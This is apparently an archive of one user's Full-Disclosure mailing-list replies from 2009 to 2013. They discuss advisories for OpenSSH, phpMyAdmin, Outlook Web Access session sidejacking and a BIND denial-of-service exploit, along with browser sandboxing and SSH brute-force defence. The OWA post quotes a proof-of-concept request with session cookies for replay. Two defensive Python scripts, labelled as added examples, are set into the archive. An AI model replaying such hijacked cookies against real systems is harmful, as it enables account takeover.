Re: [Full-disclosure] OpenSSH Security Advisory: gcmrekey.adv

2013-11-09 Thread yersinia
On Fri, Nov 8, 2013 at 7:47 PM, coderman  wrote:
> surprised not a peep about this one here yet,... hmmm
>   a fun one ;)
>
> we are accustomed to old software adding risk;
>  new (secondary effects of combined AUTH+ENC modes)
>also carries risk!

Well-known possibility, yes. In any case the problem is already well known
everywhere

https://security-tracker.debian.org/tracker/CVE-2013-4548
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4548

Best

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux Kernel Patches For Linux Kernel Security

2013-09-30 Thread yersinia
On Sat, Sep 28, 2013 at 9:53 PM, x90c  wrote:

> Hi forks!
>
>
> I release an article for linux kernel security.
> - http://www.x90c.org/articles/linux_kernel_patches.txt
>
>
Thanks, but the "article" is very short, isn't it? It looks like an annotated
index.

> x90c
>
>
>

Re: [Full-disclosure] [ MDVSA-2013:144 ] phpmyadmin

2013-04-16 Thread yersinia
Please stop sending to FD.

Already everyone here could tell you the same: no other Linux distro is
using FD for this, IIRC.

Best


2013/4/16, secur...@mandriva.com :
>  ___
>
>  Mandriva Linux Security Advisory MDVSA-2013:144
>  http://www.mandriva.com/en/support/security/
>  ___
>
>  Package : phpmyadmin
>  Date: April 16, 2013
>  Affected: Business Server 1.0
>  ___
>
>  Problem Description:
>
>  Multiple cross-site scripting (XSS) vulnerabilities in
>  tbl_gis_visualization.php in phpMyAdmin 3.5.x before 3.5.8 might allow
>  remote attackers to inject arbitrary web script or HTML via the (1)
>  visualizationSettings[width] or (2) visualizationSettings[height]
>  parameter (CVE-2013-1937).
>
>  This upgrade provides the latest phpmyadmin version (3.5.8) to address
>  this vulnerability.
>  ___
>
>  References:
>
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1937
>  ___
>
>  Updated Packages:
>
>  Mandriva Business Server 1/X86_64:
>  929b248f9b33fbf73022a491e48b88f4
> mbs1/x86_64/phpmyadmin-3.5.8-0.1.mbs1.noarch.rpm
>  9cc9136cc4280dd3d3904708be166076
> mbs1/SRPMS/phpmyadmin-3.5.8-0.1.mbs1.src.rpm
>  ___
>
>  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
>  of md5 checksums and GPG signatures is performed automatically for you.
>
>  All packages are signed by Mandriva for security.  You can obtain the
>  GPG public key of the Mandriva Security Team by executing:
>
>   gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
>  You can view other update advisories for Mandriva Linux at:
>
>   http://www.mandriva.com/en/support/security/advisories/
>
>  If you want to report vulnerabilities, please contact
>
>   security_(at)_mandriva.com
>  ___
>
>  Type Bits/KeyID Date   User ID
>  pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-- 
Sent from my mobile device



Re: [Full-disclosure] sandboxed browsing

2012-08-01 Thread yersinia
On Wed, Aug 1, 2012 at 1:38 AM, Kyle Creyts  wrote:

> Who uses something other than a browser in a virtual machine to follow
> suspicious/possibly malicious links?
>
> If you do, what do you use, and how did you choose it?
>

On Fedora/RHEL with SELinux enabled you can use the xguest account for this
http://docs.fedoraproject.org/en-US/Fedora/13/html/Security-Enhanced_Linux/sect-Security-Enhanced_Linux-Confining_Users-xguest_Kiosk_Mode.html
or run Firefox under sandbox
http://people.fedoraproject.org/~dwalsh/SELinux/Presentations/sandbox.pdf
(always SELinux related)

Best regards







Re: [Full-disclosure] Some stats about broken Linkedin passwds

2012-06-11 Thread yersinia
On Sun, Jun 10, 2012 at 4:55 PM, Georgi Guninski wrote:

> Stumbled upon this:
> http://pastebin.com/5pjjgbMt
> ===
> LinkedIn Leaked hashes password statistics (@StefanVenken)
>
> Based on the leaked 6.5 Million hashes,
> 1.354.946 were recovered within a few hours time with HashCat / Jtr and
> publicly found wordlists on a customer grade laptop.
>
> This report was created with pipal from @Digininja
> 
>
> Ironically they broke some 40 chars pwd.
>
> Another list that contains seemingly non-dictionary pwds is at:
>
> http://pastebin.com/JmtNxcnB
>
And here is an interesting analysis
http://erratasec.blogspot.it/2012/06/linkedin-vs-password-cracking.html

Best Regards


Re: [Full-disclosure] Flame= cyberwar

2012-05-28 Thread yersinia
On Mon, May 28, 2012 at 5:34 PM, Peter Dawson  wrote:

> is FLAME is actually a cyberweapon ?
>
> Apparently YES

http://securityaffairs.co/wordpress/5858/malware/call-it-flame-flamer-or-skywiper-its-a-new-cyber-weapon.html?goback=.gmp_60173.gde_60173_member_119190526.gde_60173_member_119178241

http://www.jpost.com/MiddleEast/Article.aspx?ID=271709&R=R1

 regards


Re: [Full-disclosure] Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability

2011-10-27 Thread yersinia
On Tue, Oct 25, 2011 at 8:26 PM, information security <
informationhacke...@gmail.com> wrote:

>
> ==
>
>   Microsoft Outlook Web Access Session
> sidejacking/Session Replay Vulnerability
>
> ===
>
>  by
>
> Asheesh Kumar Mani Tripathi
>
>
> # code by Asheesh kumar Mani Tripathi
>
> # email informationhacke...@gmail.com
>
>
> # Credit by Asheesh Anaconda
>
> #Date 25th Oct 2011
>
>
> #Product  Outlook Web Access 8.2.254.0
>
>
>
> #Vulnerability
> SideJacking is the process of sniffing web cookies, then replaying them to
> clone another user's web session. Using a cloned web session, the jacker can
> exploit the victim's previously-established site access
>
> #Impact
> This allows attackers that can read the network traffic to intercept all
> the data that is submitted to the server or web pages viewed by the client.
> Since this data includes the session cookie, it allows him to impersonate
> the victim, even if the password itself is not compromised.
>
>
>
> #Proof of concept
>
>
>
> 
>
>   Request
>
> 
> GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
> Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
> application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
> application/x-shockwave-flash, application/vnd.ms-excel,
> application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
> */*
> Referer: https://xxxwebmail.xxx.xxx/owa/
> Accept-Language: en-in
> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
> SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
> 3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
> Accept-Encoding: gzip, deflate
> Host: xxxwebmail.xxx.xxx
> Connection: Keep-Alive
> Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
> cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
> UserContext=e8997d6036554ada88a62dc9f2cf65d3
>
>
>
> 
>
>   Response
>
> 
>
> HTTP/1.1 200 OK
> Cache-Control: no-cache
> Pragma: no-cache
> Content-Length: 58676
> Content-Type: text/html; charset=utf-8
> Expires: -1
> Server: Microsoft-IIS/7.0
> X-AspNet-Version: 2.0.50727
> X-OWA-Version: 8.2.254.0
> X-UA-Compatible: IE=EmulateIE7
> X-Powered-By: ASP.NET
> Date: Tue, 25 Oct 2011 15:00:01 GMT
>
> #If you have any questions, comments, or concerns, feel free to contact me.
>
>
>
Probably I can't understand. Is there truly someone so crazy as to not use
SSL for the OWA access? SSL stops sidejacking, and tools, nice FWIW, such as
Hamster and Ferret, just for example.

Best Regards
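As an added example (not from the advisory above, nor Microsoft's or the reply author's code), a small Python audit of the two conditions that make the replay above possible: session cookies (sessionid, cadata and UserContext, the names from the quoted request) issued without the Secure flag, and a site that does not enforce TLS via Strict-Transport-Security. The HTTP messages it checks are constructed, with placeholder cookie values and a placeholder host.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Cookie names taken from the OWA request quoted above; presenting any of
# them is what lets a sniffed session be replayed.
SESSION_COOKIES = {"sessionid", "cadata", "UserContext"}


@dataclass
class Finding:
    cookie: str
    problems: list[str] = field(default_factory=list)


def parse_headers(raw: str) -> list[tuple[str, str]]:
    """Split a raw HTTP message into (name, value) header pairs; stops at the body."""
    lines = raw.split("\r\n") if "\r\n" in raw else raw.split("\n")
    pairs = []
    for line in lines[1:]:  # skip the request/status line
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        pairs.append((name.strip(), value.strip()))
    return pairs


def audit_set_cookie(raw_response: str) -> list[Finding]:
    """Report session cookies the server issues without Secure / HttpOnly."""
    findings = []
    for name, value in parse_headers(raw_response):
        if name.lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        if cookie_name not in SESSION_COOKIES:
            continue
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        finding = Finding(cookie_name)
        if "secure" not in attrs:
            finding.problems.append("no Secure flag: browser will also send it over plain HTTP")
        if "httponly" not in attrs:
            finding.problems.append("no HttpOnly flag: readable by injected script")
        if finding.problems:
            findings.append(finding)
    return findings


def has_hsts(raw_response: str) -> bool:
    """True if the server tells browsers to use TLS only (Strict-Transport-Security)."""
    return any(n.lower() == "strict-transport-security" for n, _ in parse_headers(raw_response))


def session_cookies_in_clear(scheme: str, raw_request: str) -> list[str]:
    """Session cookie names a client sent on a request that was not over TLS."""
    if scheme.lower() == "https":
        return []
    sent = []
    for name, value in parse_headers(raw_request):
        if name.lower() == "cookie":
            for c in value.split(";"):
                cname = c.strip().split("=", 1)[0]
                if cname in SESSION_COOKIES:
                    sent.append(cname)
    return sent


# Constructed sample messages (placeholder values, not real tokens or hosts).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/7.0\r\n"
    "Set-Cookie: sessionid=PLACEHOLDER-SESSION:000; path=/; HttpOnly\r\n"
    "Set-Cookie: UserContext=PLACEHOLDER-CTX; path=/; Secure; HttpOnly\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html>...</html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Server: Microsoft-IIS/7.0\r\n"
    "Set-Cookie: sessionid=PLACEHOLDER-SESSION:000; path=/; Secure; HttpOnly\r\n"
    "Set-Cookie: UserContext=PLACEHOLDER-CTX; path=/; Secure; HttpOnly\r\n"
    "\r\n"
)
CLEAR_REQUEST = (
    "GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1\r\n"
    "Host: webmail.example.test\r\n"
    "Cookie: sessionid=PLACEHOLDER-SESSION:000; cadata=\"PLACEHOLDER\"; "
    "UserContext=PLACEHOLDER-CTX\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for f in audit_set_cookie(WEAK_RESPONSE):
        print(f.cookie, "->", "; ".join(f.problems))
    print("HSTS present:", has_hsts(WEAK_RESPONSE))
    print("sent in clear:", session_cookies_in_clear("http", CLEAR_REQUEST))
```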


Re: [Full-disclosure] [Dailydave] [TOOL RELEASE] T50 Sukhoi PAK FA Mixed Packet Injector v2.45r-H2HC

2011-01-19 Thread yersinia
On Tue, Jan 11, 2011 at 8:43 PM, Nelson Brito  wrote:

> T50 Sukhoi PAK FA Mixed Packet Injector (f.k.a. F22 Raptor) is a tool
> designed to perform "Stress Testing".
>

Nice tool.


If you think it useful, I have added a build system
for this utility (with GNU autotools) and a toy man page.

If you're interested, I have put it all on GitHub,
even with the auto-generated tarball from make distcheck. Perhaps some small
detail still needs to be fixed. Feel free to contact me if you're interested in
this.

https://github.com/yersinia/junkcode/tree/master/tool/t50/t50-2.45r-H2HC


Greetings

>
> Nelson Brito
> Security Researcher
> http://fnstenv.blogspot.com/
>

Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-23 Thread yersinia
On Thu, Jun 17, 2010 at 4:21 PM, Samuel Martín Moro wrote:

>
> I also don't want to change my ssh port, nor restrict incoming IPs, ... and
> I use keys only to log in without entering password.
> So you're not alone.
> I had my IP changed several times, my servers are only hosting personal
> data.
> But I'm still seeing bruteforce attemps in my logs.
>
> Here's something I use on my servers.
> In cron, every 5-10 minutes, that should do it.
> Of course, if you're running *BSD, pf is way more interesting to do that.
>
Perhaps it could be better to use something standard such as fail2ban?

http://www.ducea.com/2006/07/03/using-fail2ban-to-block-brute-force-attacks/
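As an added example (not from this thread and not fail2ban's own code), a Python script that implements the core of what a fail2ban sshd jail does: it reads auth.log lines, counts failed sshd logins per source address in a sliding findtime window, and returns the addresses that reached maxretry together with the iptables rule a ban action would insert. The log excerpt, host name, PIDs, addresses and timestamps are all constructed.

```python
from __future__ import annotations
import re
from collections import defaultdict, deque
from datetime import datetime

# OpenSSH failure line in syslog format:
# "Mon DD HH:MM:SS host sshd[pid]: Failed password for [invalid user ]USER from IP port N ssh2"
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_ts(stamp: str, year: int = 2010) -> datetime:
    """Syslog stamps carry no year, so one is supplied (the constructed sample is from 2010)."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def find_offenders(lines, maxretry: int = 5, findtime: int = 600) -> dict[str, datetime]:
    """Sliding-window count of failed logins per source address.

    Returns {ip: timestamp of the first failure in the burst} for every address
    that reached `maxretry` failures within `findtime` seconds; these are the
    same two knobs a fail2ban sshd jail exposes.
    """
    windows: dict[str, deque] = defaultdict(deque)
    offenders: dict[str, datetime] = {}
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        ip, ts = m["ip"], parse_ts(m["ts"])
        window = windows[ip]
        window.append(ts)
        # drop failures older than findtime relative to the newest one
        while (ts - window[0]).total_seconds() > findtime:
            window.popleft()
        if len(window) >= maxretry and ip not in offenders:
            offenders[ip] = window[0]
    return offenders


def ban_rules(offenders, port: int = 22) -> list[str]:
    """The iptables rules a ban action would insert for each offender."""
    return [f"iptables -I INPUT -s {ip} -p tcp --dport {port} -j DROP"
            for ip in sorted(offenders)]


# Constructed auth.log excerpt: one noisy source (documentation range 203.0.113.0/24)
# and one legitimate user who mistyped a password a few times over half an hour.
SAMPLE_AUTH_LOG = """\
Jun 17 14:20:01 srv sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 51112 ssh2
Jun 17 14:20:03 srv sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51114 ssh2
Jun 17 14:20:05 srv sshd[2105]: Failed password for root from 203.0.113.7 port 51116 ssh2
Jun 17 14:20:07 srv sshd[2107]: Failed password for root from 203.0.113.7 port 51118 ssh2
Jun 17 14:20:09 srv sshd[2109]: Failed password for invalid user oracle from 203.0.113.7 port 51120 ssh2
Jun 17 14:21:00 srv sshd[2111]: Failed password for bob from 198.51.100.4 port 40001 ssh2
Jun 17 14:31:00 srv sshd[2113]: Failed password for bob from 198.51.100.4 port 40002 ssh2
Jun 17 14:41:00 srv sshd[2115]: Accepted publickey for bob from 198.51.100.4 port 40003 ssh2
Jun 17 14:51:00 srv sshd[2117]: Failed password for bob from 198.51.100.4 port 40004 ssh2
""".splitlines()

if __name__ == "__main__":
    hits = find_offenders(SAMPLE_AUTH_LOG)
    for ip, first in hits.items():
        print(f"{ip}: burst started {first:%H:%M:%S}")
    print("\n".join(ban_rules(hits)))
```

With the defaults only the burst source is flagged; lowering maxretry to 3 and widening findtime to an hour would also catch the legitimate user's three mistypes, which is the usual reason to keep both values conservative.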

[Full-disclosure] United States Department of Defense Embraces Hacker Certification to Protect US Interests

2010-03-01 Thread yersinia
Perhaps this news could be of interest to someone on this list.

http://www.free-press-release.com/news-united-states-department-of-defense-embraces-hacker-certification-to-protect-us-interests-1267435223.html

Regards

Re: [Full-disclosure] milw0rm

2009-10-19 Thread yersinia
On Mon, Oct 19, 2009 at 3:15 PM, yersinia  wrote:
> On Mon, Oct 19, 2009 at 2:22 PM, Alexandru Balan  wrote:
>> On Mon, Oct 19, 2009 at 2:48 PM, yersinia  wrote:
>>> On Mon, Oct 19, 2009 at 12:15 PM, Loup Samuel  wrote:
>>>> Milw0rm is Closed 0_o
>>>> "/str0ke have no more time for this job."
>>>>
>>>> See this indafrench'kiss'lang blog :
>>>> http://www.cnis-mag.com/milw0rm-ferme-ses-portes.html
>>> the question is: is there a necessity for these kinds of free information
>>> sites in the field of computer security?
>>
>> Security companies use sites such as milw0rm  to update their software
>> and get their customers protected from those types of attacks. So yes.
> Oh, very interesting. BTW, it is something very well known and I personally
> believe in this. But do some of these companies invest in these sites?
> For example, do they contribute to the costs?
> For sites that publish security vulnerabilities like milw0rm, not
> security research, and controlled, like SecurityFocus - not sharp
> criticism, just an opinion? I think not, sure I can be wrong. BTW, if
> not, there are not so few in 2009.
Sorry for the repost, if any.
>>
>>> especially in these days when a lot of this information is only sold
>>> and closed. If there are people who have the ambition, and the knowledge,
>>> to continue, well I am sure they will continue, knowing that there is a
>>> vast audience of people who like to follow them, in the spirit of free
>>> knowledge. And, remember, not so much knowledge is so free.
>>>>
>>>> -Message d'origine-
>>>> De : full-disclosure-boun...@lists.grok.org.uk 
>>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] De la part de Michal
>>>> Envoyé : vendredi, 16. octobre 2009 17:49
>>>> Cc : full-disclosure@lists.grok.org.uk
>>>> Objet : Re: [Full-disclosure] milw0rm
>>>>
>>>> Anders Klixbull wrote:
>>>>> I heard he ch0ked on a lemon
>>>>>
>>>> at a lemonparty
>>>>> -Original Message-
>>>>> From: full-disclosure-boun...@lists.grok.org.uk
>>>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>>>>> McGhee, Eddie
>>>>> Sent: 16. oktober 2009 12:45
>>>>> To: Armando Oliveira; Killian Faughnan
>>>>> Cc: full-disclosure@lists.grok.org.uk
>>>>> Subject: Re: [Full-disclosure] milw0rm
>>>>>
>>>>> Str0ke had a str0ke I heard.
>>>>>
>>>>> -Original Message-
>>>>> From: full-disclosure-boun...@lists.grok.org.uk
>>>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>>>>> Armando Oliveira
>>>>> Sent: 16 October 2009 11:37
>>>>> To: Killian Faughnan
>>>>> Cc: full-disclosure@lists.grok.org.uk
>>>>> Subject: Re: [Full-disclosure] milw0rm
>>>>>
>>>>> up, but last update was on  21-9-2009
>>>>> does anyone know why ?
>>>>>
>>>>> On Fri, Oct 16, 2009 at 11:27 AM, Killian Faughnan
>>>>>  wrote:
>>>>>
>>>>>>> is milw0rm dead again ?
>>>>>>>
>>>>>> Seems to be up for me.
>>>>>>
>>>>>>
>>>>>>


Re: [Full-disclosure] milw0rm

2009-10-19 Thread yersinia
On Mon, Oct 19, 2009 at 12:15 PM, Loup Samuel  wrote:
> Milw0rm is Closed 0_o
> "/str0ke have no more time for this job."
>
> See this indafrench'kiss'lang blog :
> http://www.cnis-mag.com/milw0rm-ferme-ses-portes.html
the question is: is there a necessity for these kinds of free information
sites in the field of computer security? Especially in these days when a
lot of this information is only sold and closed. If there are people
who have the ambition, and the knowledge, to continue, well I am sure
they will continue, knowing that there is a vast audience of people who
like to follow them, in the spirit of free knowledge. And, remember,
not so much knowledge is so free.
>
> -Message d'origine-
> De : full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] De la part de Michal
> Envoyé : vendredi, 16. octobre 2009 17:49
> Cc : full-disclosure@lists.grok.org.uk
> Objet : Re: [Full-disclosure] milw0rm
>
> Anders Klixbull wrote:
>> I heard he ch0ked on a lemon
>>
> at a lemonparty
>> -Original Message-
>> From: full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>> McGhee, Eddie
>> Sent: 16. oktober 2009 12:45
>> To: Armando Oliveira; Killian Faughnan
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] milw0rm
>>
>> Str0ke had a str0ke I heard.
>>
>> -Original Message-
>> From: full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>> Armando Oliveira
>> Sent: 16 October 2009 11:37
>> To: Killian Faughnan
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] milw0rm
>>
>> up, but last update was on  21-9-2009
>> does anyone know why ?
>>
>> On Fri, Oct 16, 2009 at 11:27 AM, Killian Faughnan
>>  wrote:
>>
>>>> is milw0rm dead again ?
>>>>
>>> Seems to be up for me.
>>>
>>>
>>>


Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8

2009-10-03 Thread yersinia
On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious wrote:

> Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no
> DEP/ASLR there... But as you said, so far there's no known "catch-all"
> technique against IE8.
> Along with other security features (
> http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx)
> this basicly means that IE8 is the most secure web browser nowadays?
>
Depends. IMHO there is no such thing as the most secure browser, anyway (there
is never a most secure software). But there is a more secure environment in
which the browser runs. There is some difference if I run Firefox on Windows XP
and if I run Firefox within an SELinux guest account under Fedora.

> On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott wrote:
>
>> I'm not aware of any catch-all technique just for IE8, though there are
>> a few common ones like return oriented programming.  Application
>> specific techniques are also common when third party extensions are
>> involved.
>>
>> --
>> __
>> Jared D. DeMott
>> Principal Security Researcher
>>
>>
>
>
> --
> Best wishes,
> Freddie Vicious
> http://twitter.com/viciousf
>

Re: [Full-disclosure] Dumb question: Is Windows box behind a router safe ?

2009-09-22 Thread yersinia
On Tue, Sep 22, 2009 at 9:11 PM, Abhijeet Jain
wrote:

> Myth No. 2- Using Firefox does not make you safe! In fact, IE 7/8 is the
> safest browser when used with Windows Vista because it runs on lower
> privileges.
>
Not on Linux (Fedora) with SELinux enabled; better if you run with the
guest_u SELinux user.

>
> On Tue, Sep 22, 2009 at 1:57 PM, Kos  wrote:
>
>> Ancompuger behind a router/firewall does not make it safe.
>> Vulnerabilities and exploits are not limited to a network level, which
>> is generally what a firewall is used for. Vulnerabilities sent via any
>> protocol used (http, imap, pop, other protocols that may be in use)
>> are not suddenly secure.
>>
>> An example, there are PDFs that will trigger adobe to run, whcih can
>> be exploited easily.
>> Someone can send your father an email with a malicious attatchment,
>> and a firewall isn't going to preven him from clicking and running it.
>> Anti-virus is a good start, but will only go so far.
>> There are phishing sites too.
>> The ways to get owned are countless, regardless of a firewall or not.
>>
>> You should keep the system maintained and up to date (run system
>> updates and applications undated regularly).
>>
>> So no, a firewall will not prevent a computer from being compromised.
>>
>> Other opinions?
>>
>> Kos
>>
>> On Sep 22, 2009, at 11:29 AM, Steven Anders  wrote:
>>
>> > I received great responses and am very grateful to the help from
>> > community of this list. Thank you.
>> >
>> >
>> > I have a dumb question: Is a Windows box behind a router safe ?
>> >
>> > It is my father's PC and the Windows OS was not updated regularly.
>> > The Windows box was connected through wire (RJ45) to the router. The
>> > router is then connected to the DSL modem.
>> > The Windows Box has SP2 installed and the default Windows firewall
>> > enabled - and I think was last updated from Windows Update on in
>> > 2008. It has AVG anti virus.
>> > The PC was never moved anywhere and is always behind the router. The
>> > router has default settings, which I believe has no ports open.
>> >
>> > He never installed any applications or downloads anything off the
>> > net - mainly it is used for emails and general web browsing (using
>> > Firefox, not IE). I informed him to use Firefox, since IE has so
>> > many security issues.
>> >
>> >
>> > My questions are:
>> >
>> > 1.  There are many exploits and vulnerabilities of Windows, but I
>> > was wondering if outdated Windows box behind router generally
>> > safe ?  Since, the Windows box was not updated with the latest
>> > updates.
>> >
>> > I have always thought that having a computer behind the router
>> > (since router has firewall) is generally safe, but I would love to
>> > hear insights or thoughts.
>> >
>> >
>> > 2. If a Windows box is behind a router, could a botnet be installed
>> > to it ? Assuming, the end user does not install/download any
>> > applications from the Internet and always use Firefox.
>> >
>> >
>> > Thank you all in advance.
>> > steve
>> >
>>
>
>
>
> --
> 1q4!7EEf71!u
>

[Full-disclosure] R. RHEL, RHCS, and Selinux : hype, reality or dream?

2009-09-09 Thread yersinia
So it seems that it is not necessary to be a hacker as clever as spender to
disable SELinux on a system
(http://grsecurity.net/~spender/exploit.txt).
Just follow the directions of the vendor. This one requires disabling
SELinux for the proper functioning of one of its HA products, after years in
which the same vendor was critical of commercial products, or badly compiled
open source, for SELinux execmem or textrel issues, because they required the
same.

http://marc.info/?l=selinux&m=125244025732144&w=2


James Morris's first answer

http://marc.info/?l=selinux&m=125245247920355&w=2


So articles like this are just marketing?


http://magazine.redhat.com/2007/05/04/whats-new-in-selinux-for-red-hat-enterprise-linux-5/

Regards

Re: [Full-disclosure] why not a sandbox

2009-09-07 Thread yersinia
On Sat, Sep 5, 2009 at 12:58 PM, Adrenalin  wrote:

> It seems like the plugins in Chrome are not in a sandbox
>
> "One additional, important area that is not covered by the sandbox are
> plugins like Flash. Restricting what plugins can do does not fit well with
> what users expect, which makes plugins a major vector for attack. Langley
> said that the plugin support on Linux is relatively new, but "our
> experience on Windows is that, in order for Flash to do all the things that
> various sites expect it to be able to do, the sandbox has to be so full of
> holes that it's rather useless". He is currently looking at SELinux as a
> way to potentially restrict plugins, but, for now, they are wide open. "
>
> Google's Chromium sandbox - http://lwn.net/Articles/347547/ (August 19,
> 2009)
>
> From design-documents page "It is also possible to run the plugin processes
> inside a sandbox target, using the --safe-plugins command line." hm
>
IMHO, if you want to go into a real, or almost real, sandbox you have to
execute with a MAC security policy. Something like
http://danwalsh.livejournal.com/13376.html

BTW, xguest is on Fedora 10/11.  But a virtual machine could be better.
Protected with sVirt, of course. http://danwalsh.livejournal.com/30565.html


> On Sat, Sep 5, 2009 at 12:23 PM, BlackHawk  wrote:
>
>> doesn't chrome already run any single tab in a sandbox?
>>
>> http://dev.chromium.org/developers/design-documents/sandbox
>>

Re: [Full-disclosure] THISISNOTMYEXPLOIT

2009-08-03 Thread yersinia
On Mon, Aug 3, 2009 at 5:49 PM, taha wrote:
>
>
> On Sat, Aug 1, 2009 at 3:25 PM, yersinia  wrote:
>>
>> On Fri, Jul 31, 2009 at 5:58 PM, Kingcope wrote:
>> > Hello people,
>> > Yes there is a warning when the PoC is compiled. But I guess that is
>> > not a big issue.
>>
>> No problem. It is only necessary to include stdlib.h because malloc
>> is implicitly defined (gcc complaint). Anyway, your PoC works as
>> expected. Thanks. These days it is difficult to see a true exploit
>> on a mailing list. The fact that the bug was discovered by someone else
>> is not important: you have rewritten it in another language, so it is
>> only your work.
>>
>> Regards
>> > So about what PoC am I talking about?
>> > It seems that the moderator of bugtraq keeps blocking me because of
>> > fancy
>> > headlines maybe. The moderator of bugtraq blocked the actual exploit but
>> > let
>> > the following messages slip through. The PoC is on milw0rm.com and
>> > full disclosure.
>> > Thanks for clarifying the issue with the zones, I really have not a
>> > 100% understanding
>> > of the DNS protocol therefore I took a guess on my named.conf file and
>> > put the
>> > address into the PoC.
>> >
>> > Thanks for your time,
>> >
>> > Kingcope
>> >
>> >
>> > 2009/7/31 yersinia :
>> >> Repost for mailing problem.
>> >> On Fri, Jul 31, 2009 at 12:14 AM, yersinia 
>> >> wrote:
>> >>>
>> >>> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope 
>> >>> wrote:
>> >>>>
>> >>>> Hello again,
>> >>>> the default setting of 127.in-addr.arpa is a bit weird
>> >>>>
>> >>>> try
>> >>>> ./bind  localhost
>> >>>
>> >>> Never mind. I have only a warning from gcc because it was necessary to
>> >>> include stdlib.h for malloc.
>> >>>
>> >>> But, the important thing is that it works as expected.
>> >>>
>> >>> Regards
>> >>>>
>> >>>> lewls
>> >>>>
>> >>>> XD
>> >>>>
>> >>>> kcope
>> >>>>
>
> Hello all,
> By reading the US-CERT vulnerability issue (CVE-2009-0696) I found this:
> "The vulnerability affects all servers that are masters for one or more
> zones and is not limited to those that are configured to allow dynamic
> updates". I have some Infoblox master DNS servers with dynamic updates
> not allowed, so I'm wondering if they are vulnerable to this attack and if
> somebody has tested this PoC on a DNS server which does not allow dynamic
> updates? What is the behaviour in this case?

Crash.



Re: [Full-disclosure] THISISNOTMYEXPLOIT

2009-08-01 Thread yersinia
On Fri, Jul 31, 2009 at 5:58 PM, Kingcope wrote:
> Hello people,
> Yes there is a warning when the PoC is compiled. But I guess that is
> not a big issue.

No problem. It is only necessary to include stdlib.h because malloc
is implicitly defined (gcc complaint). Anyway, your PoC works as
expected. Thanks. These days it is difficult to see a true exploit
on a mailing list. The fact that the bug was discovered by someone else
is not important: you have rewritten it in another language, so it is
only your work.

Regards
> So about what PoC am I talking about?
> It seems that the moderator of bugtraq keeps blocking me because of fancy
> headlines maybe. The moderator of bugtraq blocked the actual exploit but let
> the following messages slip through. The PoC is on milw0rm.com and
> full disclosure.
> Thanks for clarifying the issue with the zones, I really have not a
> 100% understanding
> of the DNS protocol therefore I took a guess on my named.conf file and put the
> address into the PoC.
>
> Thanks for your time,
>
> Kingcope
>
>
> 2009/7/31 yersinia :
>> Repost for mailing problem.
>> On Fri, Jul 31, 2009 at 12:14 AM, yersinia  wrote:
>>>
>>> On Thu, Jul 30, 2009 at 1:24 PM, Kingcope  wrote:
>>>>
>>>> Hello again,
>>>> the default setting of 127.in-addr.arpa is a bit weird
>>>>
>>>> try
>>>> ./bind  localhost
>>>
>>> Never mind. I have only a warning from gcc because it was necessary to
>>> include stdlib.h for malloc.
>>>
>>> But, the important thing is that it works as expected.
>>>
>>> Regards
>>>>
>>>> lewls
>>>>
>>>> XD
>>>>
